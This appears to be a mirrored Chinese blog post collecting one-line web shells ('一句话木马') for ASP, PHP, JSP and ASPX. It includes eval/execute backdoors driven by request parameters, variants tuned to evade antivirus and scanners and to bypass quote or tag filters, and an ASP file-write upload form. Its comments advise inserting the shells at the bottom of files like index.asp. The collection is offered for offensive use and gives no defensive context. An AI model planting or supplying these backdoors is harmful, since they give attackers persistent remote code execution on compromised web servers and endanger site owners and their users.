zoukankan      html  css  js  c++  java
  • 各种一句话木马大全

    各种一句话木马大全

    <%eval request("c")%>
    <%execute request("c")%>
    <%execute(request("c"))%>
    <%ExecuteGlobal request("sb")%>
    %><%Eval(Request(chr(35)))%><%
    <%if request ("c")<>""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%>
    <%eval(Request.Item["c"],"unsafe");%>
    '备份专用
    <%eval(request("c")):response.end%>
    '无防下载表,有防下载表突破专用一句话
    <%execute request("c")%><%<%loop<%:%>
    <%<%loop<%:%><%execute request("c")%>
    <%execute request("c")<%loop<%:%>
    '防杀防扫专用
    <%if Request("c")<>"" ThenExecuteGlobal(Request("c"))%>
    '不用"<,>"
    <script language=VBScript runat=server>execute request("c")</script>
    <% @Language="JavaScript" CodePage="65001"var lcx={'名字':Request.form('#'),'性别':eval,'年龄':'18','昵称':'请叫我一声老大'};lcx.性别((lcx.
    名字)+'') %>
    <script language=vbs runat=server>eval(request("c"))</script>
    <script language=vbs runat=server>eval_r(request("c"))</script>
    '不用双引号
    <%eval request(chr(35))%>
    '可以躲过雷客图
    <%set ms = server.CreateObject("MSScriptControl.ScriptControl.1") ms.Language="VBScript" ms.AddObject"response",response ms.AddObject

    "request",request ms.ExecuteStatement("ev"&"al(request(""c""))")%>
    <%dy=request("dy")%><%Eval(dy)%>
    '容错代码
    if Request("sb")<>"" then ExecuteGlobal request("sb") end if
    PHP一句话

    <?php eval($_POST1);?>
    <?php if(isset($_POST['c'])){eval($_POST['c']);}?>
    <?php system($_REQUEST1);?>
    <?php ($_=@$_GET1).@$_($_POST1)?>
    <?php eval_r($_POST1)?>
    <?php @eval_r($_POST1)?>//容错代码
    <?php assert($_POST1);?>//使用Lanker一句话客户端的专家模式执行相关的PHP语句
    <?$_POST['c']($_POST['cc']);?>
    <?$_POST['c']($_POST['cc'],$_POST['cc'])?>
    <?php @preg_replace("/[email]/e",$_POST['h'],"error");?>/*使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入*/:<O>h=@eval_r($_POST1);</O>
    <?php echo `$_GET['r']` ?>
    //绕过<?限制的一句话
    <script language="php">@eval_r($_POST[sb])</script>
    //绕过<?php ?>限制的一句话 

    <?=eval($_POST['cmd']);

    JSP一句话

    <%if(request.getParameter("f")!=null)(newjava.io.FileOutputStream (application.getRealPath("\")+request.getParameter("f"))).write (request.getParameter("t").getBytes());%>
    提交客户端
    <form action="" method="post"><textareaname="t"></textarea><br/><input type="submit"value="提交"></form>
    ASPX一句话
    <script language="C#"runat="server">WebAdmin2Y.x.y a=new WebAdmin2Y.x.y("add6bb58e139be10")</script>

     
    普通的php一句话:<?php @eval($_POST['r00ts']);?>
    普通的asp一句话:<%eval(Request.Item["r00ts"],”unsafe”);%>
    aspx突破一流的:
    dim da
    set fso=server.createobject("scripting.filesystemobject")
    path=request("path")
    if path<>"" then
    data=request("da")
    set da=fso.createtextfile(path,true)
    da.write data
    if err=0 then
    Response.Write "yes"
    else
    Response.Write "no"
    end if
    err.clear
    end if
    set da=nothing
    set fos=nothing
    Response.Write "<form action=" method=post>"
    Response.Write "<input type=text name=path>"
    Response.Write "<br>"
    Response.Write "当前文件路径:"&server.mappath(request.servervariables("script_name"))
    Response.Write "<br>"
    Response.Write "操作系统为:"&Request.ServerVariables("OS")
    Response.Write "<br>"
    Response.Write "WEB服务器版本为:"&Request.ServerVariables("SERVER_SOFTWARE")
    Response.Write "<br>"
    Response.Write "<textarea name=da cols=50 rows=10 width=30></textarea>"
    Response.Write "<br>"
    Response.Write "<input type=submit value=save>"
    Response.Write "</form>"
    </Script>


    ASP一句话:<%IfRequest(“1″)<>”"ThenExecuteGlobal(Request(“1″))%>

    PHP防杀放扫 一句话:<?php (])?>
    上面这句是防杀防扫的!网上很少人用!可以插在网页任何ASP文件的最底部不会出错,比如
    index.asp里面也是可以的!

    因为加了判断!加了判断的PHP一句话,与上面的ASP一句话相同道理,也是可以插在任何PHP文件
    的最底部不会出错!<?if(isset($_POST['1'])){eval($_POST['1']);}?><?php system
    ($_REQUEST[1]);?>

    无防下载表,有防下载表可尝试插入以下语句突破的一句话
    <%execute request(“class”)%><%'<% loop <%:%><%'<% loop <%:%><%execute request
    (“class”)%><%execute request(“class”)'<% loop <%:%>

    备份专用<%eval(request(“1″)):response.end%>

    asp一句话<%execute(request(“1″))%>
    aspx一句话:<scriptrunat=”server”>WebAdmin2Y.x.y aaaaa =newWebAdmin2Y.x.y
    (“add6bb58e139be10″);</script>

    可以躲过雷客图的一句话。
    <%set ms = server.CreateObject(“MSScriptControl.ScriptControl.1″)
    ms.Language=”VBScript”ms.AddObject”Response”,Responsems.AddObject”request”,
    requestms.ExecuteStatement(“ev”&”al(request(“”1″”))”)%>

    不用'<,>‘的asp一句话<scriptrunat=server>execute request(“1″)</script>

    不用双引号的一句话。<%eval request(chr(35))%>

  • 相关阅读:
    python连接SMTP的TLS(587端口)发邮件python发邮件(带认证,587端口)202010
    JAVA抓取通过JS渲染的网站(动态)网页数据
    moviepy音视频剪辑:与大小相关的视频变换函数详解
    区块链知识博文1: 共识算法之争(PBFT,Raft,PoW,PoS,DPoS,Ripple)
    MoviePy v2.0.0.dev1尚不成熟,不建议大家使用
    区块链学习2:一些概念性的基础知识笔记
    老猿学5G:3GPP 5G规范中的URI资源概念
    区块链学习1:Merkle树(默克尔树)和Merkle根
    老猿Python博客文章目录索引
    老猿学5G:融合计费场景的Nchf_ConvergedCharging_Create、Update和Release融合计费消息交互过程
  • 原文地址:https://www.cnblogs.com/Rcsec/p/9426301.html
Copyright © 2011-2022 走看看